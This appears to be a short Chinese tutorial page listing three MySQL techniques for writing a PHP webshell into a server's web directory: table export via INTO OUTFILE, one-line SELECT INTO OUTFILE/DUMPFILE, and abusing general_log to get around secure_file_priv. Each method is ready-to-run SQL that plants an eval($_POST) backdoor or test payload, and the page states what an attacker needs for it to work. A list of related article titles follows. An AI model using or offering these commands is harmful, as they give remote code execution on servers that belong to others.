一、常规导入shell的操作
创建数据表导出shell
CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );
INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\WWW\\90sec.php’;
DROP TABLE IF EXISTS `shadow9`;
Ps:(1)利用条件secure_file_priv=(未写路径)
(2)知道目标的绝对路径
二、一句话导出shell:
select ‘<?php @eval($_POST[pass]);?>‘ into outfile ‘c:/phpstudy/www/90sec.php‘;
select ‘<?php @eval($_POST[pass]);?>‘ into outfile ‘c:\\phpstudy\\www\\90sec.php‘;
select ‘<?php @eval($_POST[pass]);?>‘ into dumpfile ‘c:\\phpstudy\\www\\bypass.php‘;
Ps:(1)利用条件secure_file_priv=(未写路径)
(2)知道目标的绝对路径
三、日志备份获取shell
show global variables like "%genera%"; //查询general_log配置
set global general_log=‘on‘; //开启general log模式
SET global general_log_file=‘D:/phpStudy/WWW/cmd.php‘; //设置日志文件保存路径
SELECT ‘<?php phpinfo();?>‘; //phpinfo()写入日志文件
set global general_log=‘off‘; //关闭general_log模式
Ps:(1)可以绕过secure_file_priv=
(2)知道目标的绝对路径
相关文章
- 10-15一种少见的跨目录写webshell方法
- 10-15【海东青电子-简书】touchgfx 之 《IAR-hex文件的烧写方法》
- 10-15给微软的依赖注入框架写一些扩展方法
- 10-15给微软的依赖注入框架写一些扩展方法
- 10-15写一个方法,输入一个文件名和一个字符串,统计这个字符串在这个文件中出现的次数。
- 10-15用户Word写毕业论文时的文献引用方法
- 10-15有什么方法判断网站后台是用什么语言写的
- 10-15在主函数中提示用户输入用户名和密码。另写一方法来判断用户输入是否正确。该方法分别返回一个bool类型的登录结果和和一个string类型的登录信息。如登录成功,返回true及“登录成功”,若登录失败则返回false及“用户名错误”或“密码错误”(使用out参数)
- 10-15写一个将当前页面 URL 中的 get 参数解析成一个对象的方法。
- 10-15ES6新增对象方法的访问描述符:get(只读)、set(只写)